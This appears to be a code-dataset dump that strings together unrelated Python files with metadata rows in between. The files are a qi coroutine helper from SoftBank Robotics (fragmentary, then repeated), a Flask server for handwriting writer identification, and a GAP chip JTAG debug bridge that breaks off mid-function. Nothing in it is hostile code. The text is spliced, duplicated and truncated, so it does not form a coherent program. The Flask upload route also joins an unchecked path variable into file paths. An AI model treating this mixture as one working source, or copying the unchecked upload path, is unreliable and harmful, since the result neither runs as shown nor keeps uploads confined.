self.sub_future = _MultiFuture(future, self.__ask_for_next, tuple)
elif isinstance(future, Return):
# Special case: we returned a special "Return" object
# in this case, stop execution.
self.__finish(future.value)
else:
future.then(self.__handle_done)
self.sub_future = future
except StopIteration:
self.__finish(None)
except Exception as exc:
with self.lock:
self._exception = exc
self.running = False
self.promise.setError(str(exc))
# self.__finish(None) # May not be best way of finishing?
def async_generator(func):
"""Decorator that turns a future-generator into a future.
This allows having a function that does a bunch of async actions one
after the other without awkward "then/andThen" syntax, returning a
future-like object (actually a GeneratorFuture) that can be cancelled, etc.
"""
@functools.wraps(func)
def function(*args, **kwargs):
"Wrapped function"
return GeneratorFuture(func(*args, **kwargs))
return function
def public_async_generator(func):
"""Variant of async_generator that returns an actual future.
This allows you to expose it through a qi interface (on a service), but
that means cancel will not stop the whole chain.
"""
@functools.wraps(func)
def function(*args, **kwargs):
"Wrapped function"
return GeneratorFuture(func(*args, **kwargs)).future
return function
class Return(object):
"Use to wrap a return function "
@async_generator
def broken_sleep(t):
"Helper - async version of time.sleep"
time.sleep(t)
# TODO: instead of blocking a thread do something with qi.async
yield Return(None)
MICROSECONDS_PER_SECOND = 1000000
sleep = _Sleep
| 33.334532 | 89 | 0.629546 | """
Helper for easily doing async tasks with coroutines.
It's mostly syntactic sugar that removes the need for .then and .andThen.
Simply:
- make a generator function that yields futures (e.g. from qi.async)
- add the decorator async_generator
For example:
@stk.coroutines.async_generator
def run_test(self):
yield ALTextToSpeech.say("ready", _async=True)
yield ALTextToSpeech.say("steady", _async=True)
time.sleep(1)
yield ALTextToSpeech.say("go", _async=True)
... this will turn run_test into a function that returns a future that is
valid when the call is done - and that is still cancelable (your robot will
start speaking).
As your function now returns a future, it can be used in "yield run_test()" in
another function wrapped with this decorator.
"""
__version__ = "0.1.2"
__copyright__ = "Copyright 2017, Aldebaran Robotics / Softbank Robotics Europe"
__author__ = 'ekroeger'
__email__ = 'ekroeger@softbankrobotics.com'
import functools
import time
import threading
import qi
class _MultiFuture(object):
"""Internal helper for handling lists of futures.
The callback will only be called once, with either an exception or a
list of the right type and size.
"""
def __init__(self, futures, callback, returntype):
self.returntype = returntype
self.callback = callback
self.expecting = len(futures)
self.values = [None] * self.expecting
self.failed = False
self.futures = futures
for i, future in enumerate(futures):
future.then(lambda fut: self.__handle_part_done(i, fut))
def __handle_part_done(self, index, future):
"Internal callback for when a sub-function is done."
if self.failed:
# We already raised an exception, don't do anything else.
return
assert self.expecting, "Got more callbacks than expected!"
try:
self.values[index] = future.value()
except Exception as exception:
self.failed = True
self.callback(exception=exception)
return
self.expecting -= 1
if not self.expecting:
# We have all the values
self.callback(self.returntype(self.values))
def cancel(self):
for future in self.futures:
future.cancel()
class FutureWrapper(object):
"Abstract base class for objects that pretend to be a future."
def __init__(self):
self.running = True
self.promise = qi.Promise()
self.future = self.promise.future()
self._exception = ""
self.lock = threading.Lock()
def then(self, callback):
"""Add function to be called when the future is done; returns a future.
The callback will be called with a (finished) future.
"""
if self.running: # We might want a mutex here...
return self.future.then(callback)
else:
callback(self)
# return something? (to see when we have a testcase for this...)
def andThen(self, callback):
"""Add function to be called when the future is done; returns a future.
The callback will be called with a return value (for now, None).
"""
if self.running: # We might want a mutex here...
return self.future.andThen(callback)
else:
callback(self.future.value()) #?
# return something? (to see when we have a testcase for this...)
def hasError(self):
"Was there an error in one of the generator calls?"
return bool(self._exception)
def wait(self):
"Blocks the thread until everything is finished."
self.future.wait()
def isRunning(self):
"Is the sequence of generators still running?"
return self.future.isRunning()
def value(self):
"""Blocks the thread, and returns the final generator return value.
For now, always returns None."""
if self._exception:
raise self._exception
else:
return self.future.value()
def hasValue(self):
"Tells us whether the generator 1) is finished and 2) has a value."
# For some reason this doesn't do what I expected
# self.future.hasValue() returns True even if we're not finished (?)
if self.running:
return False
elif self._exception:
return False
else:
return self.future.hasValue()
def isFinished(self):
"Is the generator finished?"
return self.future.isFinished()
def error(self):
"Returns the error of the future."
return self.future.error()
def isCancelable(self):
"Is this future cancelable? Yes, it always is."
return True
def cancel(self):
"Cancel the future, and stop executing the sequence of actions."
with self.lock:
self.running = False
self.promise.setCanceled()
def isCanceled(self):
"Has this already been cancelled?"
return not self.running
def addCallback(self, callback):
"Add function to be called when the future is done."
self.then(callback)
# You know what? I'm not implementing unwrap() because I don't see a
# use case.
class GeneratorFuture(FutureWrapper):
    """Future-like object (same interface) made for wrapping a generator.

    Drives a generator that yields futures: each yielded future is waited
    on, its value is sent back into the generator, and the sequence ends
    when the generator is exhausted or yields a Return(value).
    """

    def __init__(self, generator):
        FutureWrapper.__init__(self)
        self.generator = generator
        # React if our own future is finished from the outside.
        self.future.addCallback(self.__handle_finished)
        self.sub_future = None  # the future currently being waited on
        self.__ask_for_next()

    def __handle_finished(self, future):
        """Internal callback: our future was completed externally."""
        if self.running:
            # promise was directly finished by someone else - cancel what we were doing!
            self.running = False
            if self.sub_future:
                self.sub_future.cancel()

    def __handle_done(self, future):
        "Internal callback for when the current sub-function is done."
        try:
            self.__ask_for_next(future.value())
        except Exception as exception:
            # future.value() raised (the sub-future failed); feed the
            # error back into the generator via throw().
            self.__ask_for_next(exception=exception)

    def __finish(self, value):
        "Finish and return."
        with self.lock:
            self.running = False
            self.promise.setValue(value)

    def __ask_for_next(self, arg=None, exception=None):
        "Internal - get the next future in the generator and wait on it."
        if self.running:
            try:
                self.sub_future = None  # TODO: handle multifuture
                if exception:
                    future = self.generator.throw(exception)
                else:
                    future = self.generator.send(arg)
                if isinstance(future, list):
                    # Several futures yielded at once — presumably waited
                    # on together by _MultiFuture (TODO confirm semantics).
                    self.sub_future = _MultiFuture(future, self.__ask_for_next, list)
                elif isinstance(future, tuple):
                    self.sub_future = _MultiFuture(future, self.__ask_for_next, tuple)
                elif isinstance(future, Return):
                    # Special case: we returned a special "Return" object
                    # in this case, stop execution.
                    self.__finish(future.value)
                else:
                    future.then(self.__handle_done)
                    self.sub_future = future
            except StopIteration:
                # Generator exhausted without a Return: resolve with None.
                self.__finish(None)
            except Exception as exc:
                # A generator step raised: record it and fail the promise.
                with self.lock:
                    self._exception = exc
                    self.running = False
                    self.promise.setError(str(exc))
                # self.__finish(None) # May not be best way of finishing?
def async_generator(func):
    """Decorator that turns a future-generator into a future.

    Lets a function perform a sequence of async actions without the
    awkward "then/andThen" chaining syntax; the wrapper returns a
    future-like object (actually a GeneratorFuture) that can be
    cancelled, etc.
    """
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        "Run *func* and wrap the resulting generator in a GeneratorFuture."
        return GeneratorFuture(func(*args, **kwargs))
    return wrapper
def public_async_generator(func):
    """Variant of async_generator that returns an actual future.

    This makes the result exposable through a qi interface (on a
    service); the trade-off is that cancelling it will not stop the
    whole chain.
    """
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        "Run *func* and expose the underlying qi future of the chain."
        return GeneratorFuture(func(*args, **kwargs)).future
    return wrapper
class Return(object):
    """Sentinel wrapper yielded by a generator to deliver a final value.

    Yielding ``Return(x)`` stops the driving GeneratorFuture and makes
    it finish with ``x`` as its result.
    """

    def __init__(self, value):
        # The final value the surrounding future should resolve to.
        self.value = value
@async_generator
def broken_sleep(t):
    "Helper - async version of time.sleep"
    # Blocks the calling thread for the full duration — hence "broken".
    time.sleep(t)
    # TODO: instead of blocking a thread do something with qi.async
    yield Return(None)
MICROSECONDS_PER_SECOND = 1000000
class _Sleep(FutureWrapper):
    """Future that resolves to None after a delay scheduled via qi.

    NOTE(review): ``qi.async`` is a syntax error on Python 3.7+, where
    ``async`` became a keyword (newer qi releases expose ``qi.async_``)
    — confirm the targeted qi/Python versions.
    """
    def __init__(self, time_in_secs):
        FutureWrapper.__init__(self)
        # qi's delay parameter is expressed in microseconds.
        time_in_microseconds = int(MICROSECONDS_PER_SECOND * time_in_secs)
        self.toto = qi.async(self.set_finished, delay=time_in_microseconds)
    def set_finished(self):
        "Resolve the wrapped promise with None."
        with self.lock:
            self.promise.setValue(None)
sleep = _Sleep
| 1,320 | 7 | 234 |
f684d2fa6876886e9049ae01821730a76d6c747f | 11,049 | py | Python | server/controllers/rootcontroller.py | Shaalan31/LIWI | b4d615e0951b7c28c9258d0d7a8ff86c73c4ebe2 | [
"MIT"
] | 2 | 2019-10-16T07:37:46.000Z | 2020-10-04T10:31:02.000Z | server/controllers/rootcontroller.py | Shaalan31/LIWI | b4d615e0951b7c28c9258d0d7a8ff86c73c4ebe2 | [
"MIT"
] | 3 | 2021-03-19T00:22:56.000Z | 2022-01-13T01:12:35.000Z | server/controllers/rootcontroller.py | Shaalan31/LIWI | b4d615e0951b7c28c9258d0d7a8ff86c73c4ebe2 | [
"MIT"
] | 2 | 2019-06-04T10:58:39.000Z | 2019-06-06T18:52:01.000Z | import uuid
from flask import Flask, request, jsonify, send_from_directory
from flask_socketio import SocketIO
from server.httpexceptions.exceptions import ExceptionHandler
from server.services.writerservice import *
from server.utils.writerencoder import *
import time
app = Flask(__name__)
# 'threading' async mode keeps Socket.IO on plain threads (no
# eventlet/gevent dependency).
socket = SocketIO(app, async_mode='threading')
writer_service = WriterService(socket)
# Folders are resolved relative to this file so the app works from any cwd.
UPLOAD_FOLDER = os.path.join(os.path.dirname(__file__), '../../uploads/')
dataset_path = os.path.join(os.path.dirname(__file__), '../../../All Test Cases/')
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
# Custom encoder so writer objects can be passed to jsonify directly.
app.json_encoder = WriterEncoder
@app.errorhandler(ExceptionHandler)
def handle_invalid_usage(error):
    """Translate a raised ExceptionHandler into the JSON HTTP response.

    The response body carries the handler's status code, message and data;
    all routes in this module report their results by raising
    ExceptionHandler, so this is the single response-rendering point.
    """
    payload = jsonify(error.to_dict())
    payload.status_code = error.status_code
    return payload
@app.route("/writers", methods=['GET'])
def get_writers_not_none():
"""
API to get all writers for predition where features not none
:raise: Exception containing:
message:
- "OK" for success
- "No writers found" if there is no writer
status_code:
- 200 for success
- 404 if there is no writer
data:
- list of WritersVo: each writervo contains id, name, username
- None if there is no writer
"""
# # global thread
# # with thread_lock:
# # if thread is None:
# thread = socket.start_background_task(background_thread)
language = request.args.get('lang', None)
if language == 'en':
status_code, message, data = writer_service.get_writers_not_none()
else:
status_code, message, data = writer_service.get_writers_arabic_not_none()
raise ExceptionHandler(message=message.value, status_code=status_code.value, data=data)
@app.route("/allWriters", methods=['GET'])
def get_writers():
"""
API to get all writers for training *Language independent
:raise: Exception containing:
message:
- "OK" for success
- "No writers found" if there is no writer
status_code:
- 200 for success
- 404 if there is no writer
data:
- list of WritersVo: each writervo contains id, name, username
- None if there is no writer
"""
status_code, message, data = writer_service.get_all_writers()
raise ExceptionHandler(message=message.value, status_code=status_code.value, data=data)
@app.route("/fitClassifiers", methods=['GET'])
def fit_classifiers():
"""
API to get fit classifiers for training *Language independent
:raise: Exception containing:
message:
- "OK" for success
status_code:
- 200 for success
"""
language = request.args.get('lang', None)
status_code, message = writer_service.fit_classifiers(language)
raise ExceptionHandler(message=message.value, status_code=status_code.value)
@app.route("/predict", methods=['POST'])
def get_prediction():
"""
API for predicting a writer of the image
:parameter: Query parameter lang
- en for english
- ar for arabic
:parameter: request contains
- writers ids: writers_ids
- image name: _filename
:raise: Exception contains
- response message:
"OK" for success, "Error in prediction" for prediction conflict,"Maximum number of writers exceeded" for exceeding maximum numbers
- response status code:
200 for success, 500 for prediction conflict,400 for exceeding maximum number
"""
print("New prediction request")
try:
# get image from request
filename = request.get_json()['_filename']
testing_image = cv2.imread(UPLOAD_FOLDER + 'testing/' + filename)
# get features of the writers
# writers_ids = request.get_json()['writers_ids']
language = request.args.get('lang', None)
image_base_url = request.host_url + 'image/writers/'
if language == "ar":
status, message, writers_predicted = writer_service.predict_writer_arabic(testing_image, filename,
image_base_url)
else:
status, message, writers_predicted = writer_service.predict_writer(testing_image, filename, image_base_url)
time.sleep(60)
raise ExceptionHandler(message=message.value, status_code=status.value,
data=writers_predicted)
except KeyError as e:
raise ExceptionHandler(message=HttpMessages.CONFLICT_PREDICTION.value, status_code=HttpErrors.CONFLICT.value)
@app.route("/writer", methods=['POST'])
def create_writer():
"""
API for creating a new writer
:parameter: request contains
- writer name: _name
- writer username: _username
- image name: _image
- address: _address
- phone: _phone
- national id: _nid
:raise: Exception contains
- response message:
"OK" for success, "Writer already exists" for duplicate username
- response status code:
200 for success, 409 for duplicate username
"""
# request parameters
new_writer = request.get_json()
status_code, message = validate_writer_request(new_writer)
writer_id = None
if status_code.value == 200:
status_code, message, writer_id = writer_service.add_writer(new_writer)
raise ExceptionHandler(message=message.value, status_code=status_code.value, data=writer_id)
@app.route("/profile", methods=['GET'])
def get_profile():
"""
API to get writer's profile
:parameter: Query parameter id
Query parameter lang
- en for english
- ar for arabic
:raise: Exception containing:
message:
- "OK" for success
- "Writer is not found" if writer does not exist
status_code:
- 200 for success
- 404 if writer does not exist
data:
- ProfileVo object containing writer's: id, name, username, address, phone, nid
- None if writer does not exist
"""
writer_id = request.args.get('id', None)
status_code, message, profile_vo = writer_service.get_writer_profile(writer_id, request.host_url)
raise ExceptionHandler(message=message.value, status_code=status_code.value, data=profile_vo)
@app.route("/image/<path>", methods=['POST'])
def upload_image(path):
"""
API for uploading images
request: image: file of the image
:param: path: path variable to identify the folder to upload in
- writers: for writers
- testing: for testing
- training: for training
:raise: Exception contains
- response message:
"OK" for success, "Upload image failed" for any fail in upload
- response status code:
200 for success, 409 for any fail in upload
"""
try:
path = request.view_args['path']
image = request.files["image"]
image_name = str(uuid.uuid1()) + '.jpg'
image.save(UPLOAD_FOLDER + path + '/' + image_name)
raise ExceptionHandler(message=HttpMessages.SUCCESS.value, status_code=HttpErrors.SUCCESS.value,
data=image_name)
except KeyError as e:
raise ExceptionHandler(message=HttpMessages.UPLOADFAIL.value, status_code=HttpErrors.CONFLICT.value)
@app.route("/image/<path>/<filename>", methods=['GET'])
def get_image(path, filename):
"""
API to get the image
:param path: path variable for folder to get the image from
- writers: for writers
- testing: for testing
- training: for training
:param filename: path variable for image name
:return: url for image in case found, url fo image not found in case not found
"""
try:
path = request.view_args['path'] + '/' + request.view_args['filename']
return send_from_directory(UPLOAD_FOLDER, path)
except:
path = request.view_args['path'] + '/not_found.png'
return send_from_directory(UPLOAD_FOLDER, path)
# raise ExceptionHandler(message=HttpMessages.IMAGENOTFOUND.value, status_code=HttpErrors.NOTFOUND.value)
@app.route("/writer", methods=['PUT'])
def update_writer_features():
"""
API for updating a writer features
:parameter: Query parameter lang
- en for english
- ar for arabic
:parameter: request contains
- image name: _filename
- writer id: _id
:raise: Exception contains
- response message:
"OK" for success, "Not found" for image not found
- response status code:
200 for success, 400 for image not found
"""
try:
# get image from request
filename = request.get_json()['_filename']
training_image = cv2.imread(UPLOAD_FOLDER + 'training/' + filename)
# get writer
writer_id = int(request.get_json()['_id'])
language = request.args.get('lang', None)
if language == "ar":
status_code, message = writer_service.update_features_arabic(training_image, filename, writer_id)
else:
status_code, message = writer_service.update_features(training_image, filename, writer_id)
raise ExceptionHandler(message=message.value, status_code=status_code.value)
except KeyError as e:
raise ExceptionHandler(message=HttpMessages.NOTFOUND.value, status_code=HttpErrors.NOTFOUND.value)
@app.route("/setWriters")
def set_writers():
"""
API for filling database collection with dummy data
:parameter Query parameter lang
- en for english
- ar for arabic
:raise: Exception contains
- response message:
"OK" for success
- response status code:
200 for success
"""
start_class = 1
end_class = 300
language = request.args.get('lang', None)
if language == "ar":
base_path = dataset_path + 'KHATT/Samples/Class'
status_code, message = writer_service.fill_collection_arabic(start_class, end_class, base_path)
else:
base_path = dataset_path + 'Dataset/Training/Class'
status_code, message = writer_service.fill_collection(start_class, end_class, base_path)
raise ExceptionHandler(message=message.value, status_code=status_code.value)
if __name__ == '__main__':
    # NOTE(review): the /fitClassifiers route passes a language argument to
    # fit_classifiers, but none is passed here — confirm the service's
    # signature provides a default.
    writer_service.fit_classifiers()
    print("Classifiers are fitted!")
    socket.run(app)
| 35.07619 | 148 | 0.630736 | import uuid
from flask import Flask, request, jsonify, send_from_directory
from flask_socketio import SocketIO
from server.httpexceptions.exceptions import ExceptionHandler
from server.services.writerservice import *
from server.utils.writerencoder import *
import time
app = Flask(__name__)
socket = SocketIO(app, async_mode='threading')
writer_service = WriterService(socket)
UPLOAD_FOLDER = os.path.join(os.path.dirname(__file__), '../../uploads/')
dataset_path = os.path.join(os.path.dirname(__file__), '../../../All Test Cases/')
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
app.json_encoder = WriterEncoder
@app.errorhandler(ExceptionHandler)
def handle_invalid_usage(error):
"""
Error Handler for class Exception Handler
:param error:
:return: response containing:
status code, message, and data
"""
response = jsonify(error.to_dict())
response.status_code = error.status_code
return response
@app.route("/writers", methods=['GET'])
def get_writers_not_none():
"""
API to get all writers for predition where features not none
:raise: Exception containing:
message:
- "OK" for success
- "No writers found" if there is no writer
status_code:
- 200 for success
- 404 if there is no writer
data:
- list of WritersVo: each writervo contains id, name, username
- None if there is no writer
"""
# # global thread
# # with thread_lock:
# # if thread is None:
# thread = socket.start_background_task(background_thread)
language = request.args.get('lang', None)
if language == 'en':
status_code, message, data = writer_service.get_writers_not_none()
else:
status_code, message, data = writer_service.get_writers_arabic_not_none()
raise ExceptionHandler(message=message.value, status_code=status_code.value, data=data)
@app.route("/allWriters", methods=['GET'])
def get_writers():
"""
API to get all writers for training *Language independent
:raise: Exception containing:
message:
- "OK" for success
- "No writers found" if there is no writer
status_code:
- 200 for success
- 404 if there is no writer
data:
- list of WritersVo: each writervo contains id, name, username
- None if there is no writer
"""
status_code, message, data = writer_service.get_all_writers()
raise ExceptionHandler(message=message.value, status_code=status_code.value, data=data)
@app.route("/fitClassifiers", methods=['GET'])
def fit_classifiers():
"""
API to get fit classifiers for training *Language independent
:raise: Exception containing:
message:
- "OK" for success
status_code:
- 200 for success
"""
language = request.args.get('lang', None)
status_code, message = writer_service.fit_classifiers(language)
raise ExceptionHandler(message=message.value, status_code=status_code.value)
@app.route("/predict", methods=['POST'])
def get_prediction():
"""
API for predicting a writer of the image
:parameter: Query parameter lang
- en for english
- ar for arabic
:parameter: request contains
- writers ids: writers_ids
- image name: _filename
:raise: Exception contains
- response message:
"OK" for success, "Error in prediction" for prediction conflict,"Maximum number of writers exceeded" for exceeding maximum numbers
- response status code:
200 for success, 500 for prediction conflict,400 for exceeding maximum number
"""
print("New prediction request")
try:
# get image from request
filename = request.get_json()['_filename']
testing_image = cv2.imread(UPLOAD_FOLDER + 'testing/' + filename)
# get features of the writers
# writers_ids = request.get_json()['writers_ids']
language = request.args.get('lang', None)
image_base_url = request.host_url + 'image/writers/'
if language == "ar":
status, message, writers_predicted = writer_service.predict_writer_arabic(testing_image, filename,
image_base_url)
else:
status, message, writers_predicted = writer_service.predict_writer(testing_image, filename, image_base_url)
time.sleep(60)
raise ExceptionHandler(message=message.value, status_code=status.value,
data=writers_predicted)
except KeyError as e:
raise ExceptionHandler(message=HttpMessages.CONFLICT_PREDICTION.value, status_code=HttpErrors.CONFLICT.value)
@app.route("/writer", methods=['POST'])
def create_writer():
"""
API for creating a new writer
:parameter: request contains
- writer name: _name
- writer username: _username
- image name: _image
- address: _address
- phone: _phone
- national id: _nid
:raise: Exception contains
- response message:
"OK" for success, "Writer already exists" for duplicate username
- response status code:
200 for success, 409 for duplicate username
"""
# request parameters
new_writer = request.get_json()
status_code, message = validate_writer_request(new_writer)
writer_id = None
if status_code.value == 200:
status_code, message, writer_id = writer_service.add_writer(new_writer)
raise ExceptionHandler(message=message.value, status_code=status_code.value, data=writer_id)
@app.route("/profile", methods=['GET'])
def get_profile():
"""
API to get writer's profile
:parameter: Query parameter id
Query parameter lang
- en for english
- ar for arabic
:raise: Exception containing:
message:
- "OK" for success
- "Writer is not found" if writer does not exist
status_code:
- 200 for success
- 404 if writer does not exist
data:
- ProfileVo object containing writer's: id, name, username, address, phone, nid
- None if writer does not exist
"""
writer_id = request.args.get('id', None)
status_code, message, profile_vo = writer_service.get_writer_profile(writer_id, request.host_url)
raise ExceptionHandler(message=message.value, status_code=status_code.value, data=profile_vo)
@app.route("/image/<path>", methods=['POST'])
def upload_image(path):
"""
API for uploading images
request: image: file of the image
:param: path: path variable to identify the folder to upload in
- writers: for writers
- testing: for testing
- training: for training
:raise: Exception contains
- response message:
"OK" for success, "Upload image failed" for any fail in upload
- response status code:
200 for success, 409 for any fail in upload
"""
try:
path = request.view_args['path']
image = request.files["image"]
image_name = str(uuid.uuid1()) + '.jpg'
image.save(UPLOAD_FOLDER + path + '/' + image_name)
raise ExceptionHandler(message=HttpMessages.SUCCESS.value, status_code=HttpErrors.SUCCESS.value,
data=image_name)
except KeyError as e:
raise ExceptionHandler(message=HttpMessages.UPLOADFAIL.value, status_code=HttpErrors.CONFLICT.value)
@app.route("/image/<path>/<filename>", methods=['GET'])
def get_image(path, filename):
"""
API to get the image
:param path: path variable for folder to get the image from
- writers: for writers
- testing: for testing
- training: for training
:param filename: path variable for image name
:return: url for image in case found, url fo image not found in case not found
"""
try:
path = request.view_args['path'] + '/' + request.view_args['filename']
return send_from_directory(UPLOAD_FOLDER, path)
except:
path = request.view_args['path'] + '/not_found.png'
return send_from_directory(UPLOAD_FOLDER, path)
# raise ExceptionHandler(message=HttpMessages.IMAGENOTFOUND.value, status_code=HttpErrors.NOTFOUND.value)
@app.route("/writer", methods=['PUT'])
def update_writer_features():
"""
API for updating a writer features
:parameter: Query parameter lang
- en for english
- ar for arabic
:parameter: request contains
- image name: _filename
- writer id: _id
:raise: Exception contains
- response message:
"OK" for success, "Not found" for image not found
- response status code:
200 for success, 400 for image not found
"""
try:
# get image from request
filename = request.get_json()['_filename']
training_image = cv2.imread(UPLOAD_FOLDER + 'training/' + filename)
# get writer
writer_id = int(request.get_json()['_id'])
language = request.args.get('lang', None)
if language == "ar":
status_code, message = writer_service.update_features_arabic(training_image, filename, writer_id)
else:
status_code, message = writer_service.update_features(training_image, filename, writer_id)
raise ExceptionHandler(message=message.value, status_code=status_code.value)
except KeyError as e:
raise ExceptionHandler(message=HttpMessages.NOTFOUND.value, status_code=HttpErrors.NOTFOUND.value)
@app.route("/setWriters")
def set_writers():
"""
API for filling database collection with dummy data
:parameter Query parameter lang
- en for english
- ar for arabic
:raise: Exception contains
- response message:
"OK" for success
- response status code:
200 for success
"""
start_class = 1
end_class = 300
language = request.args.get('lang', None)
if language == "ar":
base_path = dataset_path + 'KHATT/Samples/Class'
status_code, message = writer_service.fill_collection_arabic(start_class, end_class, base_path)
else:
base_path = dataset_path + 'Dataset/Training/Class'
status_code, message = writer_service.fill_collection(start_class, end_class, base_path)
raise ExceptionHandler(message=message.value, status_code=status_code.value)
if __name__ == '__main__':
writer_service.fit_classifiers()
print("Classifiers are fitted!")
socket.run(app)
| 0 | 0 | 0 |
8371355d0547c59f1233c5ac2c2cbfc5c23fb02f | 5,484 | py | Python | python/bridge/chips/gap_rev1.py | VivoSoC/pulp-debug-bridge | de23caa48c4c69d1f639a33d913089f926b71e70 | [
"Apache-2.0"
] | null | null | null | python/bridge/chips/gap_rev1.py | VivoSoC/pulp-debug-bridge | de23caa48c4c69d1f639a33d913089f926b71e70 | [
"Apache-2.0"
] | null | null | null | python/bridge/chips/gap_rev1.py | VivoSoC/pulp-debug-bridge | de23caa48c4c69d1f639a33d913089f926b71e70 | [
"Apache-2.0"
] | null | null | null | #
# Copyright (C) 2018 ETH Zurich and University of Bologna
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors: Germain Haugou, ETH (germain.haugou@iis.ee.ethz.ch)
from bridge.default_debug_bridge import *
import time
# JTAG register codes for the GAP SoC TAP (presumably instruction-register
# values — confirm against the chip's JTAG documentation).
JTAG_SOC_AXIREG = 4
JTAG_SOC_CONFREG = 7
JTAG_SOC_CONFREG_WIDTH = 4  # width in bits of the confreg JTAG register
# Boot-mode values written into the confreg during the boot handshake.
BOOT_MODE_JTAG = 1
BOOT_MODE_JTAG_HYPER = 11
# Handshake values exchanged with the boot ROM through the confreg.
CONFREG_BOOT_WAIT = 1
CONFREG_PGM_LOADED = 1
CONFREG_INIT = 0
| 33.851852 | 122 | 0.632932 | #
# Copyright (C) 2018 ETH Zurich and University of Bologna
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors: Germain Haugou, ETH (germain.haugou@iis.ee.ethz.ch)
from bridge.default_debug_bridge import *
import time
JTAG_SOC_AXIREG = 4
JTAG_SOC_CONFREG = 7
JTAG_SOC_CONFREG_WIDTH = 4
BOOT_MODE_JTAG = 1
BOOT_MODE_JTAG_HYPER = 11
CONFREG_BOOT_WAIT = 1
CONFREG_PGM_LOADED = 1
CONFREG_INIT = 0
class gap_debug_bridge(debug_bridge):
    """Debug bridge for the GAP (rev1) SoC.

    Adds the GAP-specific JTAG boot handshake, binary loading and
    hyperflash programming on top of the generic debug_bridge.
    """

    def __init__(self, config, binaries=None, verbose=False, fimages=None):
        # Avoid mutable default arguments ([]): a shared list would leak
        # state between instances. Defaults behave exactly as before.
        binaries = [] if binaries is None else binaries
        super(gap_debug_bridge, self).__init__(config=config, binaries=binaries, verbose=verbose)
        self.fimages = [] if fimages is None else fimages
        self.start_cores = False

    def stop(self):
        """Reset the chip into JTAG boot mode and stall the FC.

        Returns 0 on success.
        """
        # Reset the chip and tell it we want to load via JTAG. The reset is
        # kept active while the boot mode is written so the ROM sees the
        # mode as soon as it boots.
        if self.verbose:
            print("Notifying to boot code that we are doing a JTAG boot")
        self.get_cable().chip_reset(True)
        self.get_cable().jtag_set_reg(JTAG_SOC_CONFREG, JTAG_SOC_CONFREG_WIDTH, (BOOT_MODE_JTAG << 1) | 1)
        self.get_cable().chip_reset(False)
        # Poll the confreg until the boot code signals we can load the code.
        if self.verbose:
            print("Waiting for notification from boot code")
        while True:
            reg_value = self.get_cable().jtag_get_reg(JTAG_SOC_CONFREG, JTAG_SOC_CONFREG_WIDTH, (BOOT_MODE_JTAG << 1) | 1)
            if reg_value == CONFREG_BOOT_WAIT:
                break
        print("Received for notification from boot code")
        # Stall the FC
        self.write(0x1B300000, 4, [0, 0, 1, 0])
        return 0

    def load_jtag(self, binaries):
        """Load ELF binaries over JTAG and set the FC entry point.

        Returns 0 on success, -1 if the chip could not be stopped, and
        1 if loading a binary failed.
        """
        if self.verbose:
            print('Loading binary through jtag')
        if self.stop() != 0:
            return -1
        # Load the binaries through JTAG.
        if self.verbose:
            print("Loading binaries")
        for binary in binaries:
            if self.load_elf(binary=binary):
                return 1
        # Be careful to set the new PC only after the code is loaded, as the
        # prefetch buffer immediately fetches instructions and would get
        # wrong ones otherwise (bytes are the little-endian entry address).
        self.write(0x1B302000, 4, [0x80, 0x00, 0x00, 0x1c])
        self.start_cores = True
        return 0

    def start(self):
        """Unstall the FC so it starts executing the loaded binary."""
        if self.start_cores:
            print('Starting execution')
            # Unstall the FC so that it starts fetching instructions from
            # the loaded binary.
            self.write(0x1B300000, 4, [0, 0, 0, 0])
        return 0

    def load_jtag_hyper(self, binaries):
        """Reset the chip into JTAG-hyperflash boot mode. Returns 0."""
        if self.verbose:
            print('Loading binary through jtag_hyper')
        # Reset the chip and tell it we want to boot from hyperflash; reset
        # is kept active while the boot mode is written so the ROM sees it
        # as soon as it boots.
        if self.verbose:
            print("Notifying to boot code that we are doing a JTAG boot from hyperflash")
        self.get_cable().chip_reset(True)
        self.get_cable().jtag_set_reg(JTAG_SOC_CONFREG, JTAG_SOC_CONFREG_WIDTH, BOOT_MODE_JTAG_HYPER)
        self.get_cable().chip_reset(False)
        return 0

    def flash(self, fimages):
        """Stream a flash image to the on-chip flasher program.

        The flasher exposes a handshake structure at the 'flasherHeader'
        symbol; the image is pushed in chunks through a shared buffer.
        Returns 0 on success.
        """
        MAX_BUFF_SIZE = 350 * 1024
        f_path = fimages[0]
        # Handshake fields, laid out as consecutive 32-bit words.
        addrHeader = self._get_binary_symbol_addr('flasherHeader')
        addrImgRdy = addrHeader          # host -> flasher: chunk available
        addrFlasherRdy = addrHeader + 4  # flasher -> host: ready for a chunk
        addrFlashAddr = addrHeader + 8
        addrIterTime = addrHeader + 12   # total number of chunks
        addrBufSize = addrHeader + 16    # size of the current chunk
        f_size = os.path.getsize(f_path)
        lastSize = f_size % MAX_BUFF_SIZE
        n_iter = f_size // MAX_BUFF_SIZE + (1 if lastSize else 0)
        # Wait for the flasher to come up before the first transfer.
        flasher_ready = self.read_32(addrFlasherRdy)
        while flasher_ready == 0:
            flasher_ready = self.read_32(addrFlasherRdy)
        addrBuffer = self.read_32(addrHeader + 20)  # shared data buffer
        self.write_32(addrFlashAddr, 0)
        self.write_32(addrIterTime, n_iter)
        # 'with' guarantees the image file is closed even if a transfer fails.
        with open(f_path, 'rb') as f_img:
            for i in range(n_iter):
                if lastSize and i == n_iter - 1:
                    # Final partial chunk; size rounded up to a word multiple.
                    buff_data = f_img.read(lastSize)
                    self.write(addrBuffer, lastSize, buff_data)
                    self.write_32(addrBufSize, (lastSize + 3) & ~3)
                else:
                    buff_data = f_img.read(MAX_BUFF_SIZE)
